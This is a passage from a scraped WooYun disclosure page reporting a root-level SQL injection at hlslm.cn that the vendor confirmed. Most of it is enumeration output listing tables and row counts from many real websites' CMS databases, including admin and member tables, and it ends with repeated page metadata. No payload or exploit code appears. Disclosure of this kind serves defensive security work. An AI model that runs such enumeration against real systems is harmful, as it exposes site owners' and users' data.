| sino_member_tj                        | 2       |
| sino_sys_set                          | 2       |
| sino_advancedsearch                   | 1       |
| sino_flink                            | 1       |
| sino_member_group                     | 1       |
| sino_member_stow                      | 1       |
| sino_member_type                      | 1       |
| sino_multiserv_config                 | 1       |
| sino_myadtype                         | 1       |
| sino_softconfig                       | 1       |
| sino_vote                             | 1       |
+---------------------------------------+---------+
Database: mytyxueda
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_addonarticle                     | 198     |
| dede_archives                         | 198     |
| dede_arctiny                          | 198     |
| dede_sysconfig                        | 153     |
| dede_myad                             | 20      |
| dede_erradd                           | 18      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_flinktype                        | 8       |
| dede_arctype                          | 7       |
| dede_plus                             | 7       |
| dede_channeltype                      | 6       |
| dede_sys_module                       | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_moneycard_type                   | 3       |
| dede_freelist                         | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_sys_set                          | 2       |
| dede_uploads                          | 2       |
| dede_admin                            | 1       |
| dede_homepageset                      | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_mytag                            | 1       |
| dede_search_keywords                  | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+
Database: myhhhtxueda
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| dede_sys_enum                         | 3347    |
| dede_area                             | 482     |
| dede_erradd                           | 329     |
| dede_addonarticle                     | 215     |
| dede_archives                         | 215     |
| dede_arctiny                          | 215     |
| dede_sysconfig                        | 153     |
| dede_flink                            | 23      |
| dede_myad                             | 20      |
| dede_arcmulti                         | 15      |
| dede_stepselect                       | 15      |
| dede_scores                           | 12      |
| dede_arccache                         | 9       |
| dede_arcatt                           | 8       |
| dede_arcrank                          | 8       |
| dede_arctype                          | 8       |
| dede_flinktype                        | 8       |
| dede_plus                             | 7       |
| dede_channeltype                      | 6       |
| dede_sys_module                       | 6       |
| dede_payment                          | 4       |
| dede_shops_delivery                   | 4       |
| dede_admintype                        | 3       |
| dede_co_onepage                       | 3       |
| dede_moneycard_type                   | 3       |
| dede_search_keywords                  | 3       |
| dede_freelist                         | 2       |
| dede_homepageset                      | 2       |
| dede_member_model                     | 2       |
| dede_member_stowtype                  | 2       |
| dede_mytag                            | 2       |
| dede_sys_set                          | 2       |
| dede_admin                            | 1       |
| dede_member                           | 1       |
| dede_member_group                     | 1       |
| dede_member_person                    | 1       |
| dede_member_space                     | 1       |
| dede_member_tj                        | 1       |
| dede_member_type                      | 1       |
| dede_multiserv_config                 | 1       |
| dede_softconfig                       | 1       |
| dede_vote                             | 1       |
+---------------------------------------+---------+

<code>
Database: huatongbefoundfcombbak
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| v9_linkage | 3284 |
| v9_template_bak | 483 |
| v9_menu | 343 |
| v9_attachment_index | 179 |
| v9_hits | 152 |
| v9_search | 150 |
| v9_attachment | 136 |
| v9_news_data | 126 |
| v9_news | 123 |
| v9_model_field | 78 |
| v9_category | 77 |
| v9_cache | 28 |
| v9_module | 27 |
| v9_picture | 26 |
| v9_picture_data | 26 |
| v9_position | 16 |
| v9_poster | 10 |
| v9_poster_space | 10 |
| v9_urlrule | 8 |
| v9_member_group | 7 |
| v9_position_data | 7 |
| v9_admin_role | 6 |
| v9_sso_settings | 5 |
| v9_model | 4 |
| v9_type | 4 |
| v9_workflow | 4 |
| v9_member_menu | 3 |
| v9_admin | 2 |
| v9_link | 2 |
| v9_comment_setting | 1 |
| v9_comment_table | 1 |
| v9_datacall | 1 |
| v9_page | 1 |
| v9_site | 1 |
| v9_sso_admin | 1 |
| v9_sso_applications | 1 |
| v9_wap | 1 |
+---------------------------------------+---------+
Database: njlvying.com
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dede_sys_enum | 3347 |
| dede_erradd | 692 |
| dede_area | 482 |
| dede_sysconfig | 155 |
| dede_arctype | 74 |
| dede_arcmulti | 54 |
| dede_myad | 20 |
| dede_stepselect | 15 |
| dede_scores | 12 |
| dede_plus_changyan_setting | 9 |
| dede_addonarticle | 8 |
| dede_arcatt | 8 |
| dede_archives | 8 |
| dede_arcrank | 8 |
| dede_arctiny | 8 |
| dede_flinktype | 8 |
| dede_sys_module | 7 |
| dede_channeltype | 6 |
| dede_plus | 6 |
| dede_payment | 4 |
| dede_shops_delivery | 4 |
| dede_admintype | 3 |
| dede_co_onepage | 3 |
| dede_flink | 3 |
| dede_moneycard_type | 3 |
| dede_search_keywords | 3 |
| dede_freelist | 2 |
| dede_member_model | 2 |
| dede_member_stowtype | 2 |
| dede_sys_set | 2 |
| dede_admin | 1 |
| dede_downloads | 1 |
| dede_homepageset | 1 |
| dede_member | 1 |
| dede_member_group | 1 |
| dede_member_person | 1 |
| dede_member_space | 1 |
| dede_member_tj | 1 |
| dede_member_type | 1 |
| dede_softconfig | 1 |
| dede_uploads | 1 |
| dede_vote | 1 |
+---------------------------------------+---------+
Database: jr.ydyfudao.com
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| v9_linkage | 3284 |
| v9_template_bak | 1685 |
| v9_hits | 529 |
| v9_search | 529 |
| v9_attachment_index | 467 |
| v9_attachment | 359 |
| v9_news | 350 |
| v9_news_data | 350 |
| v9_menu | 342 |
| v9_category | 322 |
| v9_model_field | 156 |
| v9_page | 120 |
| v9_tele | 90 |
| v9_tele_data | 90 |
| v9_picture | 69 |
| v9_picture_data | 69 |
| v9_form_shanghai | 44 |
| v9_cache | 30 |
| v9_module | 27 |
| v9_block_history | 24 |
| v9_links | 20 |
| v9_links_data | 20 |
| v9_form_toupiao | 19 |
| v9_model | 16 |
| v9_form_guangzhou | 12 |
| v9_vote_option | 12 |
| v9_poster | 10 |
| v9_poster_space | 10 |
| v9_urlrule | 8 |
| v9_member_group | 7 |
| v9_position | 7 |
| v9_admin_role | 6 |
| v9_form_nanjing | 6 |
| v9_sso_settings | 5 |
| v9_type | 5 |
| v9_vote_data | 4 |
| v9_vote_subject | 4 |
| v9_workflow | 4 |
| v9_block | 3 |
| v9_form_shenzhen | 3 |
| v9_member_menu | 3 |
| v9_form_changzhou | 2 |
| v9_form_ningbo | 2 |
| v9_link | 2 |
| v9_admin | 1 |
| v9_comment_setting | 1 |
| v9_comment_table | 1 |
| v9_form_suzhou | 1 |
| v9_form_wuxi | 1 |
| v9_site | 1 |
| v9_sso_admin | 1 |
| v9_sso_applications | 1 |
| v9_wap | 1 |
+---------------------------------------+---------+
Database: bfdly.com_new
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| v9_linkage | 3284 |
| v9_template_bak | 382 |
| v9_menu | 343 |
| v9_hits | 178 |
| v9_search | 178 |
| v9_news | 130 |
| v9_news_data | 130 |
| v9_attachment | 109 |
| v9_attachment_index | 108 |
| v9_category | 86 |
| v9_model_field | 78 |
| v9_picture | 48 |
| v9_picture_data | 48 |
| v9_cache | 27 |
| v9_module | 27 |
| v9_poster | 10 |
| v9_poster_space | 10 |
| v9_position | 8 |
| v9_urlrule | 8 |
| v9_member_group | 7 |
| v9_position_data | 7 |
| v9_admin_role | 6 |
| v9_sso_settings | 5 |
| v9_model | 4 |
| v9_type | 4 |
| v9_workflow | 4 |
| v9_member_menu | 3 |
| v9_admin | 2 |
| v9_link | 2 |
| v9_comment_setting | 1 |
| v9_comment_table | 1 |
| v9_page | 1 |
| v9_site | 1 |
| v9_sso_admin | 1 |
| v9_sso_applications | 1 |
| v9_wap | 1 |
+---------------------------------------+---------+
Database: huatongbefoundfcom
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| v9_linkage | 3284 |
| v9_template_bak | 489 |
| v9_menu | 343 |
| v9_attachment_index | 199 |
| v9_hits | 177 |
| v9_search | 177 |
| v9_attachment | 157 |
| v9_news_data | 133 |
| v9_news | 130 |
| v9_category | 85 |
| v9_model_field | 78 |
| v9_picture | 46 |
| v9_picture_data | 46 |
| v9_cache | 28 |
| v9_module | 27 |
| v9_poster | 10 |
| v9_poster_space | 10 |
| v9_session | 9 |
| v9_urlrule | 8 |
| v9_member_group | 7 |
| v9_position_data | 7 |
| v9_admin_role | 6 |
| v9_sso_settings | 5 |
| v9_model | 4 |
| v9_type | 4 |
| v9_workflow | 4 |
| v9_member_menu | 3 |
| v9_admin | 2 |
| v9_comment_setting | 1 |
| v9_comment_table | 1 |
| v9_datacall | 1 |
| v9_page | 1 |
| v9_position | 1 |
| v9_site | 1 |
| v9_sso_admin | 1 |
| v9_sso_applications | 1 |
| v9_times | 1 |
| v9_wap | 1 |
+---------------------------------------+---------+
Database: ruisiyingyu.com
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| v9_linkage | 3284 |
| v9_log | 694 |
| v9_menu | 333 |
| v9_model_field | 130 |
| v9_cache | 30 |
| v9_module | 26 |
| v9_attachment_index | 11 |
| v9_search | 11 |
| v9_poster | 10 |
| v9_poster_space | 10 |
| v9_hits | 9 |
| v9_type | 9 |
| v9_category | 8 |
| v9_keyword_data | 8 |
| v9_urlrule | 8 |
| v9_keyword | 7 |
| v9_member_group | 7 |
| v9_admin_role | 6 |
| v9_model | 6 |
| v9_news | 5 |
| v9_news_data | 5 |
| v9_sso_settings | 5 |
| v9_page | 4 |
| v9_workflow | 4 |
| v9_member_menu | 3 |
| v9_position_data | 3 |
| v9_attachment | 2 |
| v9_link | 2 |
| v9_admin | 1 |
| v9_comment_setting | 1 |
| v9_comment_table | 1 |
| v9_position | 1 |
| v9_site | 1 |
| v9_sso_admin | 1 |
| v9_sso_applications | 1 |
+---------------------------------------+---------+
Database: myytxueda
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dede_sys_enum | 3347 |
| dede_area | 482 |
| dede_erradd | 310 |
| dede_addonarticle | 199 |
| dede_archives | 199 |
| dede_arctiny | 199 |
| dede_sysconfig | 153 |
| dede_myad | 20 |
| dede_stepselect | 15 |
| dede_scores | 12 |
| dede_arcatt | 8 |
| dede_arcrank | 8 |
| dede_flinktype | 8 |
| dede_plus | 7 |
| dede_channeltype | 6 |
| dede_sys_module | 6 |
| dede_arctype | 5 |
| dede_search_keywords | 5 |
| dede_payment | 4 |
| dede_shops_delivery | 4 |
| de

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-08-20 09:11

厂商回复：

sql注入

漏洞评价：

2015-07-31 11:36 | f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)

我看成了好色老师联盟，怎么办

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130588

漏洞标题：好老师联盟root权限SQL注入泄漏导致全站122库/近20W用户数据告急

相关厂商：hlslm.cn

漏洞作者：路人甲

提交时间：2015-08-20 09:07

修复时间：2015-10-04 09:12

公开时间：2015-10-04 09:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0130588

漏洞标题：好老师联盟root权限SQL注入泄漏导致全站122库/近20W用户数据告急

相关厂商：hlslm.cn

漏洞作者： 路人甲

提交时间：2015-08-20 09:07

修复时间：2015-10-04 09:12

公开时间：2015-10-04 09:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0130588"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云